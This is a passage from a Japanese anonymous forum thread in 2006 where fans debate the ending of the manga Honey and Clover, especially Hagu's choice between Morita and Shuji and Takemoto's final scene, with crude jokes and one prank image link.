すっきりしました。ありがとうございます。

677 :花と名無しさん:2006/08/03(木) 07:14:22 ID:???0
はぐは特殊学級寸前のそれしか出来ない異才で
森田はなんでもできるタイプの能才。
天才っていうのはわりと後世の評価によらなければならないものです、本来

678 :花と名無しさん:2006/08/03(木) 07:17:24 ID:???0
10巻の冒頭では森田さんがフラれ、
その後読者の反応に揺らいだ作者による玉虫色のエンドになるんですね?

ハチクロにはまった日々を返してくれよ。
もっとキレイに終わって欲しかった。

679 :花と名無しさん:2006/08/03(木) 07:46:18 ID:???0
>>625
森田は、最初1年生を2回やったのは故意じゃなかったようだよ。
そして1巻初めの数話の森田は普通に卒業する気があったようだ。
つまり、留年だの再入学だのは、はぐと一緒にいるためなんでしょ。
好きな女には金を惜しまないのだ。
ミウミウのミュールもダンボールいっぱいの札束も惜しくないのだ。

680 :花と名無しさん:2006/08/03(木) 07:54:36 ID:???0
>>678
皮肉なんだろうけど、「玉虫色のエンド」って表現素敵だね。
漫画中に出てきた言い回しなの?

681 :花と名無しさん:2006/08/03(木) 07:56:27 ID:???0
>好きな女には金を惜しまないのだ。

っつか、
「自分は(今は)それくらいしかしてあげられない…」
ってのが、切ないんだよな〜

682 :花と名無しさん:2006/08/03(木) 08:03:27 ID:???0
>680
普通に使う表現だと思いまふ... >玉虫色の○○

683 :花と名無しさん:2006/08/03(木) 08:09:44 ID:???0
本編あれで最終回だなんて('д`)
なんか、内容的にまだ数話分残ってるのを
むりやり幕引いちゃった感がヒシヒシと―――

藤原デザイン事務所メインのスピンオフとか
正直惹かれナス

684 :花と名無しさん:2006/08/03(木) 08:12:32 ID:???0
「玉虫色」は「どうとでもとれる、八方美人な、あいまいな」という意味で
批判的に使われるものでは。
玉虫色の政治とかって一時マスコミで連呼されてたことがあるよね

685 :花と名無しさん:2006/08/03(木) 08:15:33 ID:???0
>>682 >>684
無知ですみませんでした・・・
ひとつ賢くなりました。

686 :花と名無しさん:2006/08/03(木) 08:48:14 ID:???0
次回

僕は空を飛ぶ

687 :花と名無しさん:2006/08/03(木) 08:48:44 ID:???0
空を飛んだ

688 :花と名無しさん:2006/08/03(木) 09:15:09 ID:???0
コミックス派の人で9巻読んで
森はぐサイコー!!と盛り上がってるブログなんか見ると
不憫でならないよ

689 :花と名無しさん:2006/08/03(木) 09:27:12 ID:???0
「色んな神様」の右下のサダコっぽい女は草間彌生さん?
ピーターがどっかで「クサマトリックス☆」とかいってたから草間さん好きなのかな。
いかにも好きそうだが。

690 :花と名無しさん:2006/08/03(木) 09:39:21 ID:???0
>>688
でもまぁ、最終回ではたけのこが頑張って
臭×はぐを阻止したっぽいし
森田は頑張ってるところをはぐみに見せたがってるし
はぐみは森田の様子をネットで見てうっとりしてたし
10巻が出ても、コミックス派の人達は
森はぐスキーな人達はまだ森はぐで萌えられるんじゃない?

私ははぐみ自体があんまり好きじゃなくて
森はぐどうでもいい…('A`)と思ってしまうけど。

691 :花と名無しさん:2006/08/03(木) 10:26:31 ID:???0
結局山田真山サイドにしか興味わかなかったからなー

692 :花と名無しさん:2006/08/03(木) 10:36:00 ID:???0
鉄人だった頃の山田なら、野宮とくっつくにしても
ああいうギャンギャン泣いてくっつくのとは違った展開で
くっつくんだろうなぁ。

693 :花と名無しさん:2006/08/03(木) 10:43:53 ID:???0
ハチクロ終わって、一条ゆかりはあんなことになってて、コーラスどうなるんだろ

694 :花と名無しさん:2006/08/03(木) 10:44:35 ID:???0
やっぱりハチクロはもうちょっと続くんじゃ
 
という事で

695 :花と名無しさん:2006/08/03(木) 12:38:58 ID:???0
…?

696 :花と名無しさん:2006/08/03(木) 12:50:39 ID:???0
かめせんにん

697 :花と名無しさん:2006/08/03(木) 12:54:47 ID:???0
マジな話で主力が計算外の事態で壊滅したら「番外編」をダラダラ続ける可能性もありだ。
「エマ」も異様に長い番外編になりそうだし。

698 :花と名無しさん:2006/08/03(木) 13:04:23 ID:???0
あーーーーーー!
蜂黒の放り投げgdgdエンド、なんかデジャヴってたんだが
絵馬だったかーーーーーーー!

途中まで丁寧に描かれていておもしろかったのに
ラストでは「え?これで終わり?それでいいの?
つか周りの人のことは…」って感想が似すぎている

699 :花と名無しさん:2006/08/03(木) 13:08:14 ID:???0
>>690
それがまさに玉虫色だね

700 :花と名無しさん:2006/08/03(木) 13:29:28 ID:???0
たけのこ、はぐに告白しろと臭に言ったり
森田に「はぐちゃんがこんな男選ばなくて正解だよ」
「はぐちゃんが金と才能だけのアンタじゃなくて
 先生を選んでくれてよかった」と言って
才能才能才能な森田と殴り合いしてたくせに

「はぐちゃん それは違うよ
 何も返したりしなくていいんじゃないかな
 はぐちゃんがあげるものではないんじゃないかな」


なーに言ってるんだコイツー
竹糞!

701 :花と名無しさん:2006/08/03(木) 13:34:05 ID:???0
>700いやそれは…
タケノコは集はぐで幸せに行くならそれでいいと思ってたんだろう。
(暗黒面見るなら森田にとられるよりイイ!だったかしれんけど)
でも実際のとこは集の告白にはぐは縛られてしまった=幸せそうに見えない
それで「何も返したりしなくていいんじゃないかな 」発言になったんでしょ

702 :花と名無しさん:2006/08/03(木) 13:39:59 ID:???0
臭ちゃんにお返ししないと…と言った時のはぐみは
悲壮感が漂ってるもんね。
臭ちゃんにご奉仕しないと…みたいな。

でもはぐみも「臭ちゃんは私の大事な大事なひと」
と心の中でポエムしてたくせになーとも思う。

森田にも竹本にも臭にも良い顔をする女、はぐ!恐ろしい子!

703 :花と名無しさん:2006/08/03(木) 14:08:16 ID:???0
はぐみ、修司には制作方面の手伝いだけして欲しかったんだよね?
いつだったか、「でも修ちゃんは血も肉も全部くれるって言う。それが怖い」
・・・つまり、制作方面だけでなく、伴侶としてパートナーに収まるだろう、
それが怖い。 みたいなことを言ってた。
この時点で修司の恋愛感情には気づいていて、受け入れづらくて困ってることになる

はぐの選択って見方を変えると、はぐが女芸術家であるための不幸なのかもね。

704 :花と名無しさん:2006/08/03(木) 14:08:23 ID:???0
はぐのお返しって…さすがにはぐもいろいろ分かってるんだろうな。
タケノコは最後にほんといい仕事したね。
臭にしてみればまさかここでオアズケになるとは思ってもいないだろうしw

705 :花と名無しさん:2006/08/03(木) 14:10:32 ID:???0
臭というロリコン悪魔から
囚われのお姫様を救い出したみたいだな。最終回の竹本は。
王子様は竹本じゃなかったけど。

706 :花と名無しさん:2006/08/03(木) 14:28:04 ID:???0
結局もつものともたざるものはどっちかが我慢しないと
分かり合えないっていう話だったか

707 :花と名無しさん:2006/08/03(木) 14:31:11 ID:???0
>>707
持たない代表の臭が最後タケノコに刺されてせいせいした。


708 :花と名無しさん:2006/08/03(木) 14:37:43 ID:???0
でも森田もお兄ちゃんが「大事な 大事なひと」だったわけでしょ

709 :花と名無しさん:2006/08/03(木) 14:50:15 ID:???0
>>686-687
なあに?

710 :花と名無しさん:2006/08/03(木) 15:02:10 ID:???0
もう臭、メタクソだな…。

そもそもこの3ヶ月の展開
(臭がはぐに発情、才能才能才能でケンカ)は
いらなかったんじゃないかとすら思う。
何のために入れたんだ、アレ。

711 :花と名無しさん:2006/08/03(木) 15:09:26 ID:???0
才能才能はタケノコが修復士ルートを自分で選ぶための儀式かなと思った
修復士って過去の天才がこさえた名品をよみがえらせる、いわばどこまで行ってもサブの仕事だよね。
天才にコンプレックスや野心を持ったままではサブは務まらないと思う。

712 :花と名無しさん:2006/08/03(木) 15:28:46 ID:???0
羽海野チカの顔
http://210.150.210.38/cgi-bin/peni/img/37001.jpg

713 :花と名無しさん:2006/08/03(木) 15:37:37 ID:???0
たけのこは大人になったけど
大人になるって、自分はこうだって確定して、狭い価値観におさまるってことでもあるね…
そんなせつなさをわかった気になっていだく八月の暑い日

真山が修はぐに納得するのも真山が大人だからだね。
森はぐは子供の直感みたいなもので結ばれてるから・・・

714 :花と名無しさん:2006/08/03(木) 15:38:14 ID:???O
お互いを認め合うってのは
聞こえはいいけど
なかなか上手く行かないもんだしな。
実際は自分のテリトリーをどれだけ譲歩出来るかが恋愛だし。
そういう意味ではみんな自分のことに精一杯な感じがして手放しに好きとは言えないキャラばっかりだ。
私は徳大寺先生が好きだw

715 :花と名無しさん:2006/08/03(木) 15:42:25 ID:???0
>>714
主要キャラはみんな掘り下げられすぎて暗黒面が丸見えだから。
そんなんだったら自分も山崎が気軽に好きさ

716 :花と名無しさん:2006/08/03(木) 15:44:14 ID:ZpTuGB2rO
前までタケノコが憎くてたまらんかったけど最終回で許す。
臭はざまーみろ。

717 :花と名無しさん:2006/08/03(木) 15:51:17 ID:???0
初めはせつない片思いの物語という触れ込みで
真山のストーカー話も思い込んだら命がけみたいでほほえましかったけど
最後は「お返し」や「札束」に象徴される
打算含みの展開になったのが鬱
結局オトナで遊び人のはずだった野宮とか
藤原デザインの美和子さんやオサレが
いちばん純粋でいい人だったのかしら

718 :花と名無しさん:2006/08/03(木) 15:58:25 ID:???0
>>717
結局タケノコは自分探しも終え、無事卒業。
臭だけ卒業寸前に落第って感じw

719 :花と名無しさん:2006/08/03(木) 15:59:59 ID:???0
掘り下げたらわかんないよー?
美和子さんも離婚歴があってそのトラウマから山崎を遠ざけてるのかもしれないし。

720 :ゆう:2006/08/03(木) 16:04:28 ID:???0
えっあのハチクロっておわったんですか?

721 :花と名無しさん:2006/08/03(木) 16:07:02 ID:???0
>>719
それでも面白そうだけど、
そこから山崎のラブアタックで心を開かせたら、真山の二番煎じじゃないかとw
 
で、また「俺は嬉しいっすよー」と真山がまたもや山崎を抱擁w

722 :花と名無しさん:2006/08/03(木) 16:07:30 ID:???0
>>721
はい。終わりました。


723 :花と名無しさん:2006/08/03(木) 16:08:18 ID:???0
竹本派の人も修はぐ展開イヤだったの?
とっくに諦めてたわけではなくて。

724 :花と名無しさん:2006/08/03(木) 16:11:13 ID:???0
自分を確立した竹本君はこころが狭くなっていて、才能と金の森田はもちろん、
自分のように告白しないではぐが自分で落ちるのを待ってた修にも反感持ってるんだよ。

725 :こづき:2006/08/03(木) 16:16:30 ID:???0
ハチクロおわったんですねぇ;д;
しらなかった・・・やっとコミックの最新刊かってきたのにー
竹本くんはすごいがんばりましたねっくっつかなかったけどアレはアレでよいと思います

726 :花と名無しさん:2006/08/03(木) 16:19:23 ID:???0
>>725
おお、そういえば臭応援するときも
臭が勝負にでようとしたからだよね。
たなぼたで顔赤くしてる汚い中年は足元すくわれて当然。
一緒にはいられないけど森田とはぐはお互いの存在を意識して
今後も生きるわけで高い次元で結ばれてるのは明らかにこっち。


727 :花と名無しさん:2006/08/03(木) 16:19:55 ID:???0
はぐは恋心は森田にあるのを自覚してるでしょ
恋心と制作欲を天秤に掛けて制作欲を選んだから
自分が思いのままに作品を作るためのツール「修ちゃん」が必要だと気がついちゃったんだよ。
ツールとして必要とはいえ相手は人間(しかも大好きな人)だから相手の幸せも願いたい…

「修ちゃんの人生下さい」発言ははぐ的には男女の仲じゃなく
文字通り「ずっと一緒にいて助けてくれる」
だから修の人生を食いつぶすんだから
代償で自分も森田は諦めなきゃならん、と思いこんでる風に読めた。

最終回の筍の「返さなくていい」発言で思いこみから解放されてるから
修ちゃんに見つめられながらこの先いつか森田と恋愛するかもわからんね、という余韻エンド。

728 :こづき:2006/08/03(木) 16:22:12 ID:???0
最近はすごい急展開でビックリしました。
山田さんが真山を諦める気になるまでがながかったからでしょうか。。


729 :花と名無しさん:2006/08/03(木) 16:23:41 ID:???0
>>727
おお、なんかその解釈だと、今までの糞展開も
ちょっとだけよかった最終回も全部繋がるね。
なるほど!!! なんか納得できた。

ウミノさーん、もっとわかりやすく描いてくれよー☆
読者に補完させるなよー☆

730 :花と名無しさん:2006/08/03(木) 16:24:38 ID:???0
玉虫色。

731 :花と名無しさん:2006/08/03(木) 16:26:23 ID:???0
修ちゃんはいつか他の女性を見つけられる人?

732 :花と名無しさん:2006/08/03(木) 16:29:12 ID:???0
>>723
竹本派だけど、臭×はぐはイヤだったよ。

森田×成長したはぐ、もしくは
成長したはぐとみんながバラバラになって
それぞれの道を歩いていくエンドが良かったなーと思ってた。

大穴の、臭ちゃんとはぐがくっつくんでも
はぐへの恋心を出したくなくて離れようとする臭ちゃんと
成長したはぐがくっつくんならいいんだが
「大好きさ!(300万ゲット)」の臭には幻滅した。

733 :花と名無しさん:2006/08/03(木) 16:29:21 ID:???0
たけのこ的には、修司もいつか「凡人の人生における幸せ」を
はぐに夢もらわなくても、「自分のように」見つけられる人。ってことかと

734 :花と名無しさん:2006/08/03(木) 16:31:42 ID:???0
森田の3札束攻撃は
「いつか俺がオレサマになって戻るまで、はぐの環境保全ヨロ!」だと思ったw

735 :花と名無しさん:2006/08/03(木) 16:34:22 ID:???0
>>727
よーするに、男をうまく使い分けてるんか

男の使い方はさすがに天才の名に恥じないはぐ

736 :花と名無しさん:2006/08/03(木) 16:34:47 ID:???0
じゃ、竹本もはぐの本心が森田にあることを気づいてるのかな?
だからあんなに才能才能責めたてたのかな・・・
森田がわかってないのがふがいなくて。

737 :花と名無しさん:2006/08/03(木) 16:37:48 ID:???0
>>732
あんな自分探しもまともにできないヤツには無理。
最終回でタケノコに人として追い越された。

738 :花と名無しさん:2006/08/03(木) 16:39:46 ID:???0
さっきからなんかビミョウにアンカーを間違うのって流行ってるのかい?

739 :花と名無しさん:2006/08/03(木) 16:39:57 ID:???0
>>737
一般人の恋愛レベルではないが
高い次元で通じてることは自分探し前から気づいてたよな。
マジで臭を刺してくれて嬉しい。
最後の最後で男になったタケノコ。

740 :花と名無しさん:2006/08/03(木) 16:42:13 ID:???0
やば全部ずれとるw

741 :花と名無しさん:2006/08/03(木) 16:42:39 ID:???0
>736
「天才同士にしか分かり合えない 何か 」をはぐと森田がしっかり共有してるのがわかるからでしょ
裸の王様じゃないけど竹には努力しても精進してもどうしても見えないもの。

742 :花と名無しさん:2006/08/03(木) 16:44:15 ID:???0
タケノコと森田の和解はスピンオフであるのかな。
最後に臭を刺したけど森田はこのこと知らんはず。


743 :花と名無しさん:2006/08/03(木) 16:47:09 ID:???0
>742
竹の子快挙ではあるけど
森田は「いつか横に立つ」気満々だから関係ないんじゃ?w

744 :花と名無しさん:2006/08/03(木) 16:48:49 ID:???0
自分はいつかケリを付けて堂々とはぐの横に立つ
それまでは大事なはぐの世話頼んだ!金はほらこれを使え!ww

745 :花と名無しさん:2006/08/03(木) 17:01:50 ID:???0
あいつが見てるからっていうのは今後の森田を突き動かす
モチベーションとして十分だな。

746 :花と名無しさん:2006/08/03(木) 17:11:03 ID:???0
>>703
>・・・つまり、制作方面だけでなく、伴侶としてパートナーに収まるだろう、
>それが怖い。 みたいなことを言ってた。

本当に読んだの??
はぐの言ってる怖いってのは、自分が選ぶ道によって
修の人生変えてしまうのが怖いってことでしょう。

>この時点で修司の恋愛感情には気づいていて、受け入れづらくて困ってることになる

はぐは修に対して、大好きな人って言ってますが?

747 :花と名無しさん:2006/08/03(木) 17:14:11 ID:???0
そりゃ大好きだろいろんな意味で。
悲痛な顔してお返ししなきゃっていうとこで
単純に男女のらぶらぶした関係には戸惑いを隠せないのは確実。
本当に男として好きならもう問題ないはずじゃん。

748 :花と名無しさん:2006/08/03(木) 17:14:41 ID:???0
>>742
和解ないほうがドラマチック

749 :花と名無しさん:2006/08/03(木) 17:18:13 ID:???0
703は読解力がないだけじゃね?

750 :花と名無しさん:2006/08/03(木) 17:23:02 ID:???0
森田もハグを見ていて、賞狙いの作品とか作ってたら修を怒りにやってくる

751 :花と名無しさん:2006/08/03(木) 17:25:13 ID:???0
703は受け入れやすい方向にわざと曲解してるのかと思ったが

752 :花と名無しさん:2006/08/03(木) 17:26:36 ID:???0
はぐの選択基準は、子が親を捨てられないみたいなもんだよね
親孝行なんだろうけど

753 :花と名無しさん:2006/08/03(木) 17:32:27 ID:???0
修司は本当に恋愛感情なのかな? はぐに夢を見させて欲しいだけ?
はぐは本当に恋愛感情なのかな? 修司に芸術手伝って欲しいだけ?
このへんが打算的だからのう。

754 :花と名無しさん:2006/08/03(木) 17:33:13 ID:???0
>752
作品の肥やしにするために臭が必要
自分の作品のために人身御供になるつもりだったので悲愴な顔してた

755 :花と名無しさん:2006/08/03(木) 17:36:28 ID:???0
肥やしっていうと語弊がある。
森田と見た桜も肥やしになったわけで。
マネージャにするために修が必要だったとか

756 :花と名無しさん:2006/08/03(木) 17:46:15 ID:???0
まあ大事な 大事な人 の号で修はぐオチで大満足してた作者が読者の反応に戸惑って
最終回に「ためらいのはぐ」描写を入れたんじゃないかという気がス

757 :花と名無しさん:2006/08/03(木) 17:47:09 ID:???0
>>756
修は、大好きさと言ってるから好きなんじゃない?
はぐも、大好きな人の大事な人生って言ってるから好きだと思う・・・

758 :花と名無しさん:2006/08/03(木) 17:47:48 ID:???0
間違えた。
757は>>753宛です。

759 :花と名無しさん:2006/08/03(木) 17:52:31 ID:???0
物事は重層的なものですよ。
それを言ったら忍も馨のことが「大好きな人」だろうしな

760 :花と名無しさん:2006/08/03(木) 17:53:01 ID:???0
9巻の54と56読んだら、はぐは修ちゃんを好きなんだと
思ったけど先月号の真山と山田の話では本当に好きなのは
森田なんだよね。

最終回、パソで森田の部屋を見てるはぐは森田が
好きなんだろうなと思った。
それを見てる修ちゃんは、森田とはぐの関係を思う
いつもの保護者修ちゃんぽかった。

なんだかワケワカンネー

761 :花と名無しさん:2006/08/03(木) 17:53:15 ID:???0
作者の説明不足すぎで痛くなってるけどはぐの葛藤って
ゲージツと恋愛に二分される苦しみじゃないの?
少し古くさい小説とか漫画でよくある「仕事と私とどっちを選ぶの!?」じゃないけど
芸術には修のサポが不可欠だけど、はぐみ個人が恋してるのは森田。
芸術に殉じるために恋は諦めました…みたいな。
で、森田もそれがわかるから一旦退場して仕切直し狙い。

762 :花と名無しさん:2006/08/03(木) 17:54:28 ID:???0
>760
>727見て見れ

763 :花と名無しさん:2006/08/03(木) 17:57:12 ID:???0
修の好きさ大好きさ!が空しいな。

764 :花と名無しさん:2006/08/03(木) 17:58:20 ID:???0
>>747
いや普通に男女の関係でも、自分のせいで相手の人生食いつぶすと思うのは恐怖じゃない?

765 :花と名無しさん:2006/08/03(木) 18:00:51 ID:???0
ダ・ヴィンチ読んだかい?
「読者のこんなはずじゃない!という声に私も揺さぶられて困っている。
三角関係や四角関係がいっぱいあった漫画だからいろんな声が起こる。
でもそこはちゃんと乗り越えて、私にしか終わらせられないんで終わらせる」
そんなこと言ってたよ。
反響による影響は多少なりともあったでしょ。
ウジウジ山田だってさー
「真山を好きな山田じゃないと山田じゃない」みたいな意見があったのかもしんない。

766 :花と名無しさん:2006/08/03(木) 18:04:58 ID:???0
>>764
はぐが芸術で修の人生を食いつぶすという実感がマンガから伝わってこないのもあるし
大体、はぐが修にはもっとふさわしい人生がある思ってるという前提でこそ
食いつぶすのが怖い、すまない、お返ししなきゃということが言えるのでは…
だから、はぐは愛される自信がないというよりは、
愛されても愛を返せないすまなさがあると思えるんだよな

767 :花と名無しさん:2006/08/03(木) 18:12:15 ID:???0
はぐ→修の大好きは男として意識してない大好きなだいじな人だよね。

森田が弱い部分をはぐに見せたことは森田的には最悪だったかもしれないけど
逆に2人の結びつきを強くしたのかなと思った。

768 :花と名無しさん:2006/08/03(木) 18:16:54 ID:???0
「読者のこんなはずじゃない!という声」

そっか。きっとファンレターとかで
ウミノさんに色々書いた人もいたんだね。
ネットでは「ヽ(`Д´)ノ ウワァァァァァン!」な感想は
2ちゃんくらいで、2ちゃん以外のファンサイトでは

 森はぐサイト=お通夜のよう、もしくは、サイトアボーン
 ハチクロ好き主婦のサイト=マンセー
 竹はぐサイト=ハチクロについて触れないようにするw
 ミクシー=マンセー
 男性のハチクロファンブログ=アニメ派や単行本派のため
   話に追いついていないw

みたいな感じで、ヽ(`Д´)ノ ウワァァァン!臭×はぐイヤー!!
な感想文は殆どみたことなかったんで…。

それとも2ちゃんをウミノ☆さんやアシスタントがチェックしてるのか!?

769 :花と名無しさん:2006/08/03(木) 18:40:20 ID:???O
>>765
non-noでハチクロや漫画特集が組まれる度に『一途な山田の想いに共感する』って意見や好きなエピソードとして2巻の告白シーンを挙げてる人が複数いたから、山田が野宮と上手く行ってた事に納得行かない読者は多いだろうね。

770 :花と名無しさん:2006/08/03(木) 18:48:05 ID:???0
年下メガネ男子萌えの主婦とか、真山視点でしかハチクロ見てない人には
修はぐもどーでもよかっただろうけど。

771 :花と名無しさん:2006/08/03(木) 18:55:43 ID:???0
>>712
すごーい。おおきいちんこだね☆

772 :花と名無しさん:2006/08/03(木) 18:56:14 ID:???0
経緯をちゃんとペース配分して描けてこなかったんだもん
「こんなはずじゃない!」ってなるよなあ。
それでも野宮山田はじっくり描いてあるほうだと思うよ。

773 :花と名無しさん:2006/08/03(木) 19:06:33 ID:???0
>>763
はぐに男として愛されてないとも知らずに…
ウミノさんは大好きキャラをファンのためにピエロにしてくれたんだよ。

774 :花と名無しさん:2006/08/03(木) 19:08:10 ID:???0
なんで真山みたいなちんこがあんなに細かく描かれるんだろ
イヤだな

775 :花と名無しさん:2006/08/03(木) 19:08:24 ID:???0
>>772
しかも最終回でも真山の思いを引きずったままの山田を
青春スーツ装着して一緒にいようとする描写まで丁寧。
丁寧すぎるぐらいだ!

776 :花と名無しさん:2006/08/03(木) 19:12:17 ID:???0
>>774

つ作者のお気に入り

777 :花と名無しさん:2006/08/03(木) 19:15:05 ID:???0
>>769
このスレでも結構
「山田と野宮は上手くいってほしくない」
「山田は真山のことをずっと思いつづけてほしい」
っていうレスもあったもんね。

自分は反対意見なんだけどさ。

778 :花と名無しさん:2006/08/03(木) 19:16:57 ID:???0
>>770
主婦サイトだと
「やっぱり学生の森田くんや竹本くんじゃたよりないわよね。
 修ちゃんかっこいいー」
みたいな感想文だったりして、ズコーッとなった。
まぁ、感じ方は人それぞれだから別にいいけどね。
世の中には色々な考え方をする人がいるなぁとか
同じハチクロファンでも、好きになりかたが色々あるなぁとか
感心したり、目からウロコが落ちたりして楽しかった。

779 :花と名無しさん:2006/08/03(木) 19:36:49 ID:???0
はぐみマジ惚れが判明するまでは修ちゃんが一番好きだったよ…その次に野宮と森田
こんな展開になるなんてほんとびっくりだ。
少女漫画でうおっって思ったのは数年ぶりだよ。
スピンオフは出来たらもうやらないで欲しいと思ってる。

780 :花と名無しさん:2006/08/03(木) 20:17:39 ID:???O
修ちゃん好きだった…
好きさ!大好きさ!でお前のことが大嫌いになったよ

781 :花と名無しさん:2006/08/03(木) 20:23:40 ID:j1m+filfO
9巻、いろんな都心の大きい本屋に電話かけまくってやっっっと購入(>_<)渋谷文○堂にありましたヨ☆ところが地元の本屋に普通に売ってました…(:_;)

782 :花と名無しさん:2006/08/03(木) 20:34:59 ID:???0
それはよかった

783 :花と名無しさん:2006/08/03(木) 21:13:50 ID:???0
痛々しい子…

784 :花と名無しさん:2006/08/03(木) 21:17:35 ID:???0
修は理花が好きなのかなってよく思ったけど
アニメでお前には俺がいるって抱きしめてたし

785 :花と名無しさん:2006/08/03(木) 21:23:59 ID:???0
最近は「なんだこれ」な展開ばかりだったけど、
最終回読んだら今までのことを思い出してしみじみした。
おわっちゃったなー。なんか寂しい。

786 :花と名無しさん:2006/08/03(木) 21:26:41 ID:???0
>でお前には俺がいるって抱きしめてたし
それ違う誰かと間違えてない?

787 :花と名無しさん:2006/08/03(木) 21:39:52 ID:???0
竹本がキャプテン翼の森崎に見えてきた

788 :花と名無しさん:2006/08/03(木) 22:49:18 ID:???0
>>778
同意。
いろんな解釈みてるとたまに目からウロコだったり
文章の上手い人のナルホドな解釈を見て感動したりして楽しい。
自分は2chしか見て無いけど…

あゆと野宮は最終回でお互い本音を言ってくれたのでわかりやすいけど
はぐ修森田はほんとにわかりにくいし解釈がわかれるんだろうなー。
自分は最終回で修は森田とはぐが成長するのを見守ってるふうに感じて
修のポイントが上がった。
しかしクライマックスの忙しい時期に主役みたいに出過ぎたのと
好きさ大好きさと叫んだ罪は重いよ。


789 :花と名無しさん:2006/08/03(木) 23:00:37 ID:???0
ウミノさんひとりで暴走しちゃったんだね☆

790 :花と名無しさん:2006/08/03(木) 23:04:58 ID:???0
今ごろ「好きさ好きさ好きさ」に
ものすごく後悔してるかもウミノタン

791 :花と名無しさん:2006/08/03(木) 23:09:13 ID:???0
>>788
>自分は最終回で修は森田とはぐが成長するのを見守ってるふうに感じて

好きさ大好きや、山田の先生も男ってのがなければ
素直にそう感じれるんだけどな・・・


792 :花と名無しさん:2006/08/03(木) 23:14:17 ID:???0
最終話読みたいけどどこにも売ってない
なんか方法ない?

793 :花と名無しさん:2006/08/03(木) 23:23:34 ID:???0
つ漫画喫茶

794 :花と名無しさん:2006/08/03(木) 23:27:18 ID:???0
みんなの好きなハチクロポエムはどれ?
自分は、セミの回のケータイのが好きだな。
ハチクロ特有のうおー甘ずっぺー読んでるほうがはずかしー!!!みたいなのはないけど
ほーなるほどって思った。
あれは竹本のモノローグなのかな。山田ケータイ持ってないし。

795 :花と名無しさん:2006/08/03(木) 23:33:17 ID:???0
山田の「あきらめるってどうやるんだろう」みたいなのが好きだった。
当時ふられたばっかだから共感した。
今となってはあれですがねぇ・・・山田しぶというえにこざかしすぎで。

796 :花と名無しさん:2006/08/03(木) 23:36:03 ID:???0
アニメでは自立エンドの雰囲気で終わってほしいよ
最終回間に合わせなくていいからw

797 :花と名無しさん:2006/08/04(金) 00:09:28 ID:???0
臭は才能ある人にくっついて生きていく寄生虫。
一生自立しない。

798 :花と名無しさん:2006/08/04(金) 00:12:20 ID:???O
>>785
>最終回読んだら今までのことを思い出してしみじみした。
>おわっちゃったなー。なんか寂しい。

つ【ハチクロ☆スピンオフ】
大ヒットのあの作品が、更にパワーアップして帰ってきた!
羽海野先生ご贔屓の萌え萌えキャラ(だけ)が大活躍ミャハ☆彡
修司(とついでにはぐみ)のその後は?真山のストーキングな日常は?野宮の恋の行方は?
超ロングラン連載のヨカーン♪
今までのハチクロは単なる序章ですよ、序章っ。
・・・書いててへコんできたorz

799 :花と名無しさん:2006/08/04(金) 00:33:53 ID:???0
もしかしてスピンオフで、臭のこれまでのはぐに対する心境を
堺萌えな羽海野タンが(萌え萌えで)書くんじゃないか?ガクブル

800 :花と名無しさん:2006/08/04(金) 00:39:40 ID:vQ+qpHUi0
私は素直に
竹本が「うまく行かなかった恋に意味はあるのかって、消えて行ってしまうものは
無かったものと同じなのか・・・」って思いながら、最後の別れ際にはぐに
渡された、ゴーカイなはちみつ&四葉のクローバーのサンドイッチ見ながら
はぐが、竹本のためだけに沢山のクローバーを集めて竹本にありったけの幸せを願う
シーンで泣けて、ラスト竹本が(片思いに)「意味はあった・・・」って泣きながら
食べてたの見てまた泣けた・・・。私的にはいい最終回ですた!

801 :背の高いブ男:2006/08/04(金) 00:41:06 ID:???0
そうかー。


802 :花と名無しさん:2006/08/04(金) 00:42:10 ID:???O
>>790
ウミノさん素直におなり
単行本でかき直していいんだよ

803 :花と名無しさん:2006/08/04(金) 00:42:48 ID:???0
四つ葉プレゼントが竹本お払い箱の意味でも?

804 :花と名無しさん:2006/08/04(金) 00:43:51 ID:???O
修の好きさ好きさはどう考えてもまずいよなやっぱり
あの回がなかったら受け入れられたかもしれないのに…

805 :花と名無しさん:2006/08/04(金) 00:45:07 ID:???0
修のこともモンゴル行きのときにお払い箱にしようとしたのに
四つ葉があげられなかったから、こんなことに…

806 :花と名無しさん:2006/08/04(金) 00:47:11 ID:???O
クローバーって食えんの?ずっと疑問なんだが。
もしクローバーに毒性があったらあのサンドイッチははぐからの
竹本市ね!!って意味だったり
ガクブル

807 :花と名無しさん:2006/08/04(金) 00:48:57 ID:???0
食ったら幸福の効能ないんじゃないかと

808 :花と名無しさん:2006/08/04(金) 00:50:42 ID:???O
好きさ好きさより先生も男発言が 無 理
近親相姦とか性犯罪とか想像しちゃって 無 理

809 :花と名無しさん:2006/08/04(金) 00:52:07 ID:???0
犬とか猫の小便かかってるだろうけど食べても死なないだろう

810 :花と名無しさん:2006/08/04(金) 00:53:56 ID:???O
好きさ好きさ…先生も男…ヒィッ

811 :花と名無しさん:2006/08/04(金) 00:56:37 ID:???0
この漫画面白いけど話が動かなさすぎて飽きた
つかずはなれずをどうでもいい葛藤で水増ししてるだけ
4巻ぐらいからだれすぎ

812 :花と名無しさん:2006/08/04(金) 01:01:14 ID:???0
無駄に関係者増やさないストーリー展開には好感持てる
ま、早速反論来そうですが

813 :花と名無しさん:2006/08/04(金) 01:05:12 ID:???0
確かに丁寧にキャラを掘り下げてるのはいいね
掴みからして強烈だ。森田にやられたようなもんだ

しかし、だからどうなるの?ってのが果てしなく先延ばしにされると辛い
物語は突き詰めれば人間関係に収束するけど
それだけでも足りないのだと改めて気付かされた

814 :花と名無しさん:2006/08/04(金) 01:08:07 ID:???0
アニメって臭エンドの為になんかセリフとか変えられてないか?
はぐも急に大人っぽいしさ。

815 :花と名無しさん:2006/08/04(金) 01:08:18 ID:???O
森はぐのチュウ、キュン!(>△<)ってなったのになぁ…。
アタシの胸キュンを返して欲しい…。

816 :花と名無しさん:2006/08/04(金) 01:10:00 ID:???0
>>806
>竹本市ね!!って意味だったり
そ、そんな…身も蓋もない事を…www

817 :花と名無しさん:2006/08/04(金) 01:12:03 ID:???0
虫殺すやつとかあったっけ?
えげつないけど、よかった

818 :花と名無しさん:2006/08/04(金) 01:13:00 ID:???0
青春はいちどだけ

819 :花と名無しさん:2006/08/04(金) 01:13:17 ID:???0
>はぐも急に大人っぽいしさ。
原作からの仕様です。

820 :花と名無しさん:2006/08/04(金) 01:18:08 ID:KhMvQqlc0
>>776
真山は作者のオキニかー。
なるほど、だから同級生なんかには見向きもせずに
一回り年上の女に熱烈に愛をささげる設定なのかぁ。
なっとく

821 :花と名無しさん:2006/08/04(金) 01:38:27 ID:???0
実際理花みたいなメンヘル女がいたら痛いよね

